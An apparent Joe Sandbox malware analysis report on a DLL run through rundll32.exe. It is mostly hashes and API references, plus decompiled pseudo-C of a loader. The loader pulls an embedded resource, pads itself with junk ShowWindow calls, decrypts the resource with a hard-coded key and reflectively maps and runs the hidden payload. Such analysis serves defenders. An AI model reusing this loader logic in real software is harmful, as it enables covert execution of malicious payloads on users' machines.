Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction ID: b907945a8bb2440a8cb3aef72e6a2d2f21cc4e48b824f8509c024221972a3f23
Opcode Fuzzy Hash: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction Fuzzy Hash: 50F01236100566BFDB126F91CC48A893F65EF092A1F014015FF08D6130C6318860DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10011DD7, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10011DE0

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10011DF3
_free.LIBCMT ref: 10011E04
_free.LIBCMT ref: 10011E15

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction ID: b92291fbf5b9387dec10b5d829ed7a1edaa60bcb681d517941d5f30f05375802
Opcode Fuzzy Hash: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction Fuzzy Hash: FBE0B6798199B0ABFB02AF54FFC14493BA1E74A758345015EFC08D2231DF351E629F99

Uniqueness

Uniqueness Score: -1.00%

Function 100250E8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100254ED
_free.LIBCMT ref: 10025542

Strings

-, xrefs: 10025390

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction ID: 66f1abc88b353573048c8297ce13dc3db2c99bd53dfa5fdd719ba2a4e5362786
Opcode Fuzzy Hash: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction Fuzzy Hash: 16C109759002569BDB20DF64EC51BEEB3F4EF05386F9140AAE80697181EB72AFC4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED39, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 1000EEA4

Strings

+, xrefs: 1000EDDF
-, xrefs: 1000EDD2

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction ID: 161e414dc9c41f8d3233c1f3fc7934caf211311be282c5be911a7171b8d9abf8
Opcode Fuzzy Hash: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction Fuzzy Hash: 7E91C370D042DE9EEF14CE68C8506EDBBB1EF453E0F14866AE875BB299D3309D418B51

Uniqueness

Uniqueness Score: -1.00%

Function 100052F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 1000532F
__IsNonwritableInCurrentImage.LIBCMT ref: 100053E3

Strings

csm, xrefs: 100053CD

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction ID: d5b3b1a8fdddd6847bee6f7c852b1cc60a9faa064ac7a8f1db0e4c0cbd549406
Opcode Fuzzy Hash: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction Fuzzy Hash: 7D41B034E00219ABEF00CF68C884A9FBBF5EF45395F208055E914AB396D772EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000616F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10006194

Strings

MOC, xrefs: 100061A6
RCC, xrefs: 100061AE

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction ID: 03575899430e62d736dc684c75bb2bfc08ffaeeadd59e420a1883adb1634af53
Opcode Fuzzy Hash: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction Fuzzy Hash: F6418B71900209EFEF02CF94CD81AEE7BB6FF48384F258199F905A7219D735A950DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10028928, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 10028928
GetCommandLineW.KERNEL32 ref: 10028933

Strings

H,D, xrefs: 1002892E

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLine
String ID: H,D
API String ID: 3253501508-3376999245
Opcode ID: 7a35c628bcc84c1edadeb40402509ddc87dc6e8051b9adbc60d2af218fbf91b8
Instruction ID: 0277076d50cd55f33acb36392dc12be973ead0d1e0f537e4754777194e04fc0f
Opcode Fuzzy Hash: 7a35c628bcc84c1edadeb40402509ddc87dc6e8051b9adbc60d2af218fbf91b8
Instruction Fuzzy Hash: A9B092789046A08FE7108F308B9C2043FB0B32A30A3C40455D605C2370F7341440CF09

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2848 Parent PID: 2296 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	32.9%
Signature Coverage:	0%
Total number of Nodes:	650
Total number of Limit Nodes:	44

Executed Functions

Function 10001E91, Relevance: 203.4, APIs: 110, Strings: 6, Instructions: 425
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10001E91(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ebp;
				signed int _t22;
				struct HINSTANCE__* _t24;
				int _t25;
				CHAR* _t29;
				void* _t33;
				void* _t35;
				int _t136;
				void* _t137;
				signed int _t138;
				signed int _t139;
				void* _t140;
				void* _t146;
				intOrPtr* _t147;
				void* _t153;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t162;
				struct HINSTANCE__* _t163;
				signed int _t173;

				_t162 = __edx;
				_t153 = __ecx;
				_t22 =  *0x1004d054; // 0x940b3682
				_v8 = _t22 ^ _t173;
				_t24 = LoadLibraryA("MFC42.DLL"); // executed
				if(_t24 == 0) {
					L5:
					_t25 = 0;
					__eflags = 0;
				} else {
					_v20 = 0x17;
					_v36 = 0;
					_v28 = 0;
					_v16 = 0x1e55;
					_v12 = 0x409;
					_t163 = LoadLibraryA("ntdll.dll");
					_t29 = E10001A7D("LdrFindResource_U", E1000E3D0("LdrFindResource_U")); // executed
					 *0x1004db58 = GetProcAddress(_t163, _t29);
					 *0x1004db5c = GetProcAddress(_t163, "LdrAccessResource");
					_push( &_v40);
					_t33 = E1000FEF7(_t153, "3");
					_pop(_t156);
					_t35 =  *0x1004db58(0x10000000,  &_v20, _t33);
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					if(_t35 >= 0) {
						 *0x1004db5c(0x10000000, _v40,  &_v36,  &_v28);
					}
					_t136 = WriteFileGather(0, 0, 0, 0, 0);
					_t179 = _t136;
					if(_t136 != 0) {
						goto L5;
					} else {
						_t137 = E1000FEF7(_t156, L"64");
						_pop(_t157);
						_t138 = E1000FEF7(_t157, L"64");
						_t139 = E1000FEF7(_t157, L"64");
						_t159 = _t137;
						_t140 = VirtualAlloc(0, _v28, _t138 * _t139, ??); // executed
						E100045C0(_t140, _v36, _v28);
						E10001D16(_t159, _t179, "k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc", 0x22,  &_v32);
						E10001D9A(_t140, _v28,  &_v32);
						_t146 = E10002838(_t140, _v28); // executed
						_t147 = E10002765( &_v21, _t146, "Control_RunDLL"); // executed
						 *_t147(); // executed
						_t25 = MessageBoxA(0,  *0x1004d024, 0, 0);
					}
				}
				return E100037EA(_t25, _v8 ^ _t173, _t162);
			}

APIs

LoadLibraryA.KERNEL32(MFC42.DLL), ref: 10001EAF
LoadLibraryA.KERNEL32(ntdll.dll), ref: 10001EDB
_strlen.LIBCMT ref: 10001EE5

Part of subcall function 10001A7D: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
Part of subcall function 10001A7D: VirtualAllocExNuma.KERNEL32 ref: 10001A96

GetProcAddress.KERNEL32(00000000,00000000), ref: 10001EFC
GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 10001F09
LdrFindResource_U.NTDLL(10000000,00000017,00000000,?), ref: 10001F29
ShowWindow.USER32(00000000,00000000), ref: 10001F39
ShowWindow.USER32(00000000,00000000), ref: 10001F3D
ShowWindow.USER32(00000000,00000000), ref: 10001F41
ShowWindow.USER32(00000000,00000000), ref: 10001F45
ShowWindow.USER32(00000000,00000000), ref: 10001F49
ShowWindow.USER32(00000000,00000000), ref: 10001F4D
ShowWindow.USER32(00000000,00000000), ref: 10001F51
ShowWindow.USER32(00000000,00000000), ref: 10001F55
ShowWindow.USER32(00000000,00000000), ref: 10001F59
ShowWindow.USER32(00000000,00000000), ref: 10001F5D
ShowWindow.USER32(00000000,00000000), ref: 10001F61
ShowWindow.USER32(00000000,00000000), ref: 10001F65
ShowWindow.USER32(00000000,00000000), ref: 10001F69
ShowWindow.USER32(00000000,00000000), ref: 10001F6D
ShowWindow.USER32(00000000,00000000), ref: 10001F71
ShowWindow.USER32(00000000,00000000), ref: 10001F75
ShowWindow.USER32(00000000,00000000), ref: 10001F79
ShowWindow.USER32(00000000,00000000), ref: 10001F7D
ShowWindow.USER32(00000000,00000000), ref: 10001F81
ShowWindow.USER32(00000000,00000000), ref: 10001F85
ShowWindow.USER32(00000000,00000000), ref: 10001F89
ShowWindow.USER32(00000000,00000000), ref: 10001F8D
ShowWindow.USER32(00000000,00000000), ref: 10001F91
ShowWindow.USER32(00000000,00000000), ref: 10001F95
ShowWindow.USER32(00000000,00000000), ref: 10001F99
ShowWindow.USER32(00000000,00000000), ref: 10001F9D
ShowWindow.USER32(00000000,00000000), ref: 10001FA1
ShowWindow.USER32(00000000,00000000), ref: 10001FA5
ShowWindow.USER32(00000000,00000000), ref: 10001FA9
ShowWindow.USER32(00000000,00000000), ref: 10001FAD
ShowWindow.USER32(00000000,00000000), ref: 10001FB1
ShowWindow.USER32(00000000,00000000), ref: 10001FB5
ShowWindow.USER32(00000000,00000000), ref: 10001FB9
ShowWindow.USER32(00000000,00000000), ref: 10001FBD
ShowWindow.USER32(00000000,00000000), ref: 10001FC1
ShowWindow.USER32(00000000,00000000), ref: 10001FC5
ShowWindow.USER32(00000000,00000000), ref: 10001FC9
ShowWindow.USER32(00000000,00000000), ref: 10001FCD
ShowWindow.USER32(00000000,00000000), ref: 10001FD1
ShowWindow.USER32(00000000,00000000), ref: 10001FD5
ShowWindow.USER32(00000000,00000000), ref: 10001FD9
ShowWindow.USER32(00000000,00000000), ref: 10001FDD
ShowWindow.USER32(00000000,00000000), ref: 10001FE1
ShowWindow.USER32(00000000,00000000), ref: 10001FE5
ShowWindow.USER32(00000000,00000000), ref: 10001FE9
ShowWindow.USER32(00000000,00000000), ref: 10001FED
ShowWindow.USER32(00000000,00000000), ref: 10001FF1
ShowWindow.USER32(00000000,00000000), ref: 10001FF5
ShowWindow.USER32(00000000,00000000), ref: 10001FF9
ShowWindow.USER32(00000000,00000000), ref: 10001FFD
ShowWindow.USER32(00000000,00000000), ref: 10002001
ShowWindow.USER32(00000000,00000000), ref: 10002005
ShowWindow.USER32(00000000,00000000), ref: 10002009
ShowWindow.USER32(00000000,00000000), ref: 1000200D
ShowWindow.USER32(00000000,00000000), ref: 10002011
ShowWindow.USER32(00000000,00000000), ref: 10002015
ShowWindow.USER32(00000000,00000000), ref: 10002019
ShowWindow.USER32(00000000,00000000), ref: 1000201D
ShowWindow.USER32(00000000,00000000), ref: 10002021
ShowWindow.USER32(00000000,00000000), ref: 10002025
ShowWindow.USER32(00000000,00000000), ref: 10002029
ShowWindow.USER32(00000000,00000000), ref: 1000202D
ShowWindow.USER32(00000000,00000000), ref: 10002031
ShowWindow.USER32(00000000,00000000), ref: 10002035
ShowWindow.USER32(00000000,00000000), ref: 10002039
ShowWindow.USER32(00000000,00000000), ref: 1000203D
ShowWindow.USER32(00000000,00000000), ref: 10002041
ShowWindow.USER32(00000000,00000000), ref: 10002045
ShowWindow.USER32(00000000,00000000), ref: 10002049
ShowWindow.USER32(00000000,00000000), ref: 1000204D
ShowWindow.USER32(00000000,00000000), ref: 10002051
ShowWindow.USER32(00000000,00000000), ref: 10002055
ShowWindow.USER32(00000000,00000000), ref: 10002059
ShowWindow.USER32(00000000,00000000), ref: 1000205D
ShowWindow.USER32(00000000,00000000), ref: 10002061
ShowWindow.USER32(00000000,00000000), ref: 10002065
ShowWindow.USER32(00000000,00000000), ref: 10002069
ShowWindow.USER32(00000000,00000000), ref: 1000206D
ShowWindow.USER32(00000000,00000000), ref: 10002071
ShowWindow.USER32(00000000,00000000), ref: 10002075
ShowWindow.USER32(00000000,00000000), ref: 10002079
ShowWindow.USER32(00000000,00000000), ref: 1000207D
ShowWindow.USER32(00000000,00000000), ref: 10002081
ShowWindow.USER32(00000000,00000000), ref: 10002085
ShowWindow.USER32(00000000,00000000), ref: 10002089
ShowWindow.USER32(00000000,00000000), ref: 1000208D
ShowWindow.USER32(00000000,00000000), ref: 10002091
ShowWindow.USER32(00000000,00000000), ref: 10002095
ShowWindow.USER32(00000000,00000000), ref: 10002099
ShowWindow.USER32(00000000,00000000), ref: 1000209D
ShowWindow.USER32(00000000,00000000), ref: 100020A1
ShowWindow.USER32(00000000,00000000), ref: 100020A5
ShowWindow.USER32(00000000,00000000), ref: 100020A9
ShowWindow.USER32(00000000,00000000), ref: 100020AD
ShowWindow.USER32(00000000,00000000), ref: 100020B1
ShowWindow.USER32(00000000,00000000), ref: 100020B5
ShowWindow.USER32(00000000,00000000), ref: 100020B9
ShowWindow.USER32(00000000,00000000), ref: 100020BD
ShowWindow.USER32(00000000,00000000), ref: 100020C1
ShowWindow.USER32(00000000,00000000), ref: 100020C5
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 100020DB
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 100020E6
VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 10002119
MessageBoxA.USER32 ref: 10002172

Strings

LdrAccessResource, xrefs: 10001EFE
ntdll.dll, xrefs: 10001EC2
Control_RunDLL, xrefs: 10002159
MFC42.DLL, xrefs: 10001EAA
k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc, xrefs: 10002133
LdrFindResource_U, xrefs: 10001EDD, 10001EE4, 10001EEB

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$AddressAllocLibraryLoadProcVirtual$AccessCurrentFileFindGatherMessageNumaProcessResourceResource_Write_strlen
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$MFC42.DLL$k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc$ntdll.dll
API String ID: 1083314109-3402274389
Opcode ID: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction ID: cb1ea1c1361b03dfa0b29133f2aa3901bb47fc6e60d4c354bfdb6088dc7855a5
Opcode Fuzzy Hash: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction Fuzzy Hash: 7A9116E1D0022C7EF621ABB28DC9DBF6E6CDE051E8B512817B50A921129E389D05CEF4

Uniqueness

Uniqueness Score: -1.00%

Function 1000288D, Relevance: 15.2, APIs: 10, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E1000288D(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v44;
				char _v48;
				void* _t75;
				void* _t81;
				long _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				void* _t105;
				signed int _t110;
				void* _t113;
				void* _t116;
				intOrPtr* _t119;
				void* _t123;
				intOrPtr _t131;
				void* _t133;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int _t139;
				long _t142;
				long _t143;
				void* _t145;

				_v8 = _v8 & 0x00000000;
				_t144 = __ecx;
				_v12 = __ecx;
				if(E100023BA(_a8, 0x40) == 0) {
					L35:
					return 0;
				}
				_t138 = _a4;
				if( *_t138 != 0x5a4d) {
					L33:
					_push(0xc1);
					L34:
					SetLastError();
					goto L35;
				}
				if(E100023BA(_a8,  *((intOrPtr*)(_t138 + 0x3c)) + 0xf8) == 0) {
					goto L35;
				}
				_t119 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
				if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 4)) != 0x14c || ( *(_t119 + 0x38) & 0x00000001) != 0) {
					goto L33;
				} else {
					_t139 =  *(_t119 + 6) & 0x0000ffff;
					_t75 = ( *(_t119 + 0x14) & 0x0000ffff) + 0x24;
					if(_t139 == 0) {
						L10:
						_push( &_v48); // executed
						L10002CBC(); // executed
						_t122 = _v44;
						_t25 = _t122 - 1; // -1
						_t26 = _t122 - 1; // -1
						_t135 =  !_t25;
						_t142 = _t26 +  *((intOrPtr*)(_t119 + 0x50)) & _t135;
						if(_t142 != (_v8 - 0x00000001 + _v44 & _t135)) {
							goto L33;
						}
						_t81 = VirtualAlloc( *(_t119 + 0x34), _t142, 0x3000, 4); // executed
						_v8 = _t81;
						if(_t81 != 0) {
							L14:
							_t83 = HeapAlloc(GetProcessHeap(), 8, 0x34);
							_t123 = _v8;
							_t143 = _t83;
							if(_t143 != 0) {
								 *(_t143 + 4) = _t123;
								 *(_t143 + 0x14) = ( *(_t119 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t143 + 0x1c)) = _a12;
								 *((intOrPtr*)(_t143 + 0x20)) = _a16;
								 *((intOrPtr*)(_t143 + 0x24)) = _a20;
								 *((intOrPtr*)(_t143 + 0x28)) = _a24;
								 *((intOrPtr*)(_t143 + 0x30)) = _v44;
								if(E100023BA(_a8,  *(_t119 + 0x54)) == 0) {
									L28:
									E100026C0(_t143);
									goto L35;
								}
								_t94 = VirtualAlloc(_v8,  *(_t119 + 0x54), 0x1000, 4); // executed
								_t145 = _t94;
								E10002C22(_t145, _a4,  *(_t119 + 0x54));
								_t97 =  *((intOrPtr*)(_a4 + 0x3c)) + _t145;
								_t144 = _v12;
								 *_t143 = _t97;
								 *((intOrPtr*)(_t97 + 0x34)) = _v8;
								_t98 = E100023D8(_v12, _a4, _a8, _t119, _t143); // executed
								if(_t98 == 0) {
									goto L28;
								}
								_t101 =  *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34);
								if( *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34)) {
									_t103 = 1;
								} else {
									_t103 = E10002B68(_t144, _t143, _t101);
								}
								 *((intOrPtr*)(_t143 + 0x18)) = _t103;
								if(E1000225B(_t143) != 0) {
									_t105 = E10002591(_t144, _t143); // executed
									if(_t105 != 0 && E100024BD(_t143) != 0) {
										_t131 =  *((intOrPtr*)( *_t143 + 0x28));
										if(_t131 == 0) {
											 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
											L32:
											return _t143;
										}
										_t110 = _v8 + _t131;
										if( *(_t143 + 0x14) == 0) {
											 *(_t143 + 0x2c) = _t110;
											goto L32;
										}
										_push(0);
										_push(1);
										_push(0x10000000);
										if( *_t110() != 0) {
											 *((intOrPtr*)(_t143 + 0x10)) = 1;
											goto L32;
										}
										SetLastError(0x45a);
									}
								}
								goto L28;
							}
							VirtualFree(_t123, _t83, 0x8000);
							L13:
							_push(0xe);
							goto L34;
						}
						_t113 = VirtualAlloc(_t81, _t142, 0x3000, 4); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L14;
						}
						goto L13;
					}
					_t133 = _v8;
					_t137 = _t75 + _t119;
					do {
						_t115 =  !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38);
						_t116 = ( !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38)) +  *_t137;
						_t137 = _t137 + 0x28;
						_t117 =  <=  ? _t133 : _t116;
						_t133 =  <=  ? _t133 : _t116;
						_t139 = _t139 - 1;
					} while (_t139 != 0);
					_v8 = _t133;
					goto L10;
				}
			}

APIs

Part of subcall function 100023BA: SetLastError.KERNEL32(0000000D,?,100028A9,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000), ref: 100023C7

GetNativeSystemInfo.KERNEL32(10002857), ref: 1000293F
VirtualAlloc.KERNELBASE(?,?,00003000,00000004,10002159,?,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49), ref: 1000296F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,10002159,00000000), ref: 10002985
GetProcessHeap.KERNEL32(00000008,00000034,?,10002159,00000000), ref: 1000299D
HeapAlloc.KERNEL32(00000000,?,10002159,00000000), ref: 100029A4
VirtualFree.KERNEL32(00000000,00000000,00008000,?,10002159,00000000), ref: 100029BA
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,10002159,?,?,10002159,00000000), ref: 10002A12
und_memcpy.LIBVCRUNTIME ref: 10002A21
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,10002159,00000000), ref: 10002AB4

Part of subcall function 100026C0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 10002726
Part of subcall function 100026C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 1000272E
Part of subcall function 100026C0: HeapFree.KERNEL32(00000000,?,10002AC2), ref: 10002735

